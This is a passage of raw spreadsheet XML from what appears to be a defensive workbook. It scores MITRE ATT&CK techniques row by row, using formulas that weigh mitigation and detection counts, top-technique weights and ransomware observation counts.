        <f t="array" ref="AH386">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC386)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI386" s="25">
        <f>IF(AH386="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ386" s="25" t="str" cm="1">
        <f t="array" ref="AJ386">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC386)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK386" s="25">
        <f>IF(AJ386="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL386" s="25" t="str" cm="1">
        <f t="array" ref="AL386">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC386)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM386" s="25">
        <f>IF(AL386="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN386" s="52">
        <v>1</v>
      </c>
      <c r="AO386" s="51">
        <v>1</v>
      </c>
      <c r="AP386" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.3817142857142855E-2</v>
      </c>
      <c r="AQ386" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.8279365079365092E-2</v>
      </c>
      <c r="AR386" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.8279365079365092E-2</v>
      </c>
      <c r="AS386" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT386" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU38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87" spans="1:47">
      <c r="A387" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.01E-2</v>
      </c>
      <c r="B387" s="25">
        <f>SUM(H387,M387,V387)*(1+SUM(AE387,AG387,AI387,AK387,AM387))</f>
        <v>0.23433333333333334</v>
      </c>
      <c r="C387" s="25" t="s">
        <v>1508</v>
      </c>
      <c r="D387" s="25" t="s">
        <v>170</v>
      </c>
      <c r="E387" s="25" t="s">
        <v>1509</v>
      </c>
      <c r="F387" s="51">
        <v>1</v>
      </c>
      <c r="G387" s="51">
        <v>1</v>
      </c>
      <c r="H387" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I387">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J387">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K387">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L387">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M387" s="25">
        <v>0</v>
      </c>
      <c r="N387" s="51">
        <v>0</v>
      </c>
      <c r="O387" s="51">
        <v>0</v>
      </c>
      <c r="P387" s="51">
        <v>2</v>
      </c>
      <c r="Q387" s="51">
        <v>0</v>
      </c>
      <c r="R387" s="52" t="s">
        <v>423</v>
      </c>
      <c r="S387" s="51">
        <v>3</v>
      </c>
      <c r="T387" s="52" t="s">
        <v>247</v>
      </c>
      <c r="U387" s="51">
        <v>4</v>
      </c>
      <c r="V387" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>7.6190476190476183E-2</v>
      </c>
      <c r="W387">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X387">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y387">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z387">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA387">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB387">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC387" s="29" t="s">
        <v>399</v>
      </c>
      <c r="AD387" s="25" t="str" cm="1">
        <f t="array" ref="AD387">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC387)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE387" s="25">
        <f>IF(AD387="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF387" s="25" t="str" cm="1">
        <f t="array" ref="AF387">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC387)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG387" s="25">
        <f>IF(AF387="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH387" s="25" t="str" cm="1">
        <f t="array" ref="AH387">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC387)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI387" s="25">
        <f>IF(AH387="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ387" s="25" t="str" cm="1">
        <f t="array" ref="AJ387">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC387)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK387" s="25">
        <f>IF(AJ387="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL387" s="25" t="str" cm="1">
        <f t="array" ref="AL387">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC387)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM387" s="25">
        <f>IF(AL387="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN387" s="52">
        <v>2</v>
      </c>
      <c r="AO387" s="51">
        <v>1</v>
      </c>
      <c r="AP387" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.01E-2</v>
      </c>
      <c r="AQ387" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.8111111111111117E-2</v>
      </c>
      <c r="AR387" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.8111111111111117E-2</v>
      </c>
      <c r="AS387" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT387" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU38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88" spans="1:47" ht="48">
      <c r="A388" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3433333333333334E-2</v>
      </c>
      <c r="B388" s="25">
        <f>SUM(H388,M388,V388)*(1+SUM(AE388,AG388,AI388,AK388,AM388))</f>
        <v>0.23433333333333334</v>
      </c>
      <c r="C388" s="25" t="s">
        <v>1510</v>
      </c>
      <c r="D388" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E388" s="25" t="s">
        <v>1511</v>
      </c>
      <c r="F388" s="51">
        <v>1</v>
      </c>
      <c r="G388" s="51">
        <v>1</v>
      </c>
      <c r="H388" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I388">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J388">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K388">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L388">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M388" s="25">
        <v>0</v>
      </c>
      <c r="N388" s="51">
        <v>0</v>
      </c>
      <c r="O388" s="51">
        <v>0</v>
      </c>
      <c r="P388" s="51">
        <v>2</v>
      </c>
      <c r="Q388" s="51">
        <v>0</v>
      </c>
      <c r="R388" s="52" t="s">
        <v>1461</v>
      </c>
      <c r="S388" s="51">
        <v>2</v>
      </c>
      <c r="T388" s="52" t="s">
        <v>1512</v>
      </c>
      <c r="U388" s="51">
        <v>5</v>
      </c>
      <c r="V388" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>7.6190476190476183E-2</v>
      </c>
      <c r="W388">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X388">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y388">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z388">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA388">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB388">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC388" s="29" t="s">
        <v>236</v>
      </c>
      <c r="AD388" s="25" t="str" cm="1">
        <f t="array" ref="AD388">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC388)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE388" s="25">
        <f>IF(AD388="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF388" s="25" t="str" cm="1">
        <f t="array" ref="AF388">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC388)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG388" s="25">
        <f>IF(AF388="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH388" s="25" t="str" cm="1">
        <f t="array" ref="AH388">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC388)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI388" s="25">
        <f>IF(AH388="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ388" s="25" t="str" cm="1">
        <f t="array" ref="AJ388">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC388)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK388" s="25">
        <f>IF(AJ388="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL388" s="25" t="str" cm="1">
        <f t="array" ref="AL388">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC388)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM388" s="25">
        <f>IF(AL388="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN388" s="52">
        <v>0</v>
      </c>
      <c r="AO388" s="51">
        <v>0</v>
      </c>
      <c r="AP388" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3433333333333334E-2</v>
      </c>
      <c r="AQ388" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.8111111111111117E-2</v>
      </c>
      <c r="AR388" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.8111111111111117E-2</v>
      </c>
      <c r="AS388" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT388" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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89" spans="1:47" ht="32.1">
      <c r="A389" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3433333333333334E-2</v>
      </c>
      <c r="B389" s="25">
        <f>SUM(H389,M389,V389)*(1+SUM(AE389,AG389,AI389,AK389,AM389))</f>
        <v>0.23433333333333334</v>
      </c>
      <c r="C389" s="25" t="s">
        <v>1513</v>
      </c>
      <c r="D389" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E389" s="25" t="s">
        <v>1514</v>
      </c>
      <c r="F389" s="51">
        <v>1</v>
      </c>
      <c r="G389" s="51">
        <v>1</v>
      </c>
      <c r="H389" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I389">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J389">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K389">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L389">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M389" s="25">
        <v>0</v>
      </c>
      <c r="N389" s="51">
        <v>0</v>
      </c>
      <c r="O389" s="51">
        <v>1</v>
      </c>
      <c r="P389" s="51">
        <v>1</v>
      </c>
      <c r="Q389" s="51">
        <v>0</v>
      </c>
      <c r="R389" s="52" t="s">
        <v>1461</v>
      </c>
      <c r="S389" s="51">
        <v>2</v>
      </c>
      <c r="T389" s="52" t="s">
        <v>1512</v>
      </c>
      <c r="U389" s="51">
        <v>5</v>
      </c>
      <c r="V389" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>7.6190476190476183E-2</v>
      </c>
      <c r="W389">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X389">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y389">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z389">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA389">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB389">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC389" s="29" t="s">
        <v>1515</v>
      </c>
      <c r="AD389" s="25" t="str" cm="1">
        <f t="array" ref="AD389">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC389)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE389" s="25">
        <f>IF(AD389="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF389" s="25" t="str" cm="1">
        <f t="array" ref="AF389">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC389)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG389" s="25">
        <f>IF(AF389="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH389" s="25" t="str" cm="1">
        <f t="array" ref="AH389">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC389)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI389" s="25">
        <f>IF(AH389="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ389" s="25" t="str" cm="1">
        <f t="array" ref="AJ389">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC389)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK389" s="25">
        <f>IF(AJ389="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL389" s="25" t="str" cm="1">
        <f t="array" ref="AL389">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC389)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM389" s="25">
        <f>IF(AL389="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN389" s="60">
        <v>0</v>
      </c>
      <c r="AO389" s="51">
        <v>0</v>
      </c>
      <c r="AP389" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3433333333333334E-2</v>
      </c>
      <c r="AQ389" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.8111111111111117E-2</v>
      </c>
      <c r="AR389" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.8111111111111117E-2</v>
      </c>
      <c r="AS389" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT389" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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90" spans="1:47" ht="63.95">
      <c r="A390" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2799999999999997E-2</v>
      </c>
      <c r="B390" s="25">
        <f>SUM(H390,M390,V390)*(1+SUM(AE390,AG390,AI390,AK390,AM390))</f>
        <v>0.22800000000000001</v>
      </c>
      <c r="C390" s="25" t="s">
        <v>1516</v>
      </c>
      <c r="D390" s="25" t="s">
        <v>1517</v>
      </c>
      <c r="E390" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F390" s="51">
        <v>1</v>
      </c>
      <c r="G390" s="51">
        <v>1</v>
      </c>
      <c r="H390" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I390">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J390">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K390">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L390">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M390" s="25">
        <v>0</v>
      </c>
      <c r="N390" s="51">
        <v>0</v>
      </c>
      <c r="O390" s="51">
        <v>15</v>
      </c>
      <c r="P390" s="51">
        <v>0</v>
      </c>
      <c r="Q390" s="51">
        <v>0</v>
      </c>
      <c r="R390" s="51"/>
      <c r="S390" s="51">
        <v>0</v>
      </c>
      <c r="T390" s="51"/>
      <c r="U390" s="51">
        <v>0</v>
      </c>
      <c r="V390" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>7.1428571428571425E-2</v>
      </c>
      <c r="W390">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X390">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y390">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z390">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>15</v>
      </c>
      <c r="AA390">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.15</v>
      </c>
      <c r="AB390">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.15</v>
      </c>
      <c r="AC390" s="29" t="s">
        <v>107</v>
      </c>
      <c r="AD390" s="25" t="str" cm="1">
        <f t="array" ref="AD390">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC390)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE390" s="25">
        <f>IF(AD390="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF390" s="25" t="str" cm="1">
        <f t="array" ref="AF390">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC390)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG390" s="25">
        <f>IF(AF390="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH390" s="25" t="str" cm="1">
        <f t="array" ref="AH390">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC390)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI390" s="25">
        <f>IF(AH390="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ390" s="25" t="str" cm="1">
        <f t="array" ref="AJ390">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC390)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK390" s="25">
        <f>IF(AJ390="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL390" s="25" t="str" cm="1">
        <f t="array" ref="AL390">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC390)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM390" s="25">
        <f>IF(AL390="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN390" s="63"/>
      <c r="AO390" s="51"/>
      <c r="AP390" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2799999999999997E-2</v>
      </c>
      <c r="AQ390" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.5999999999999998E-2</v>
      </c>
      <c r="AR390" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.5999999999999998E-2</v>
      </c>
      <c r="AS390" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
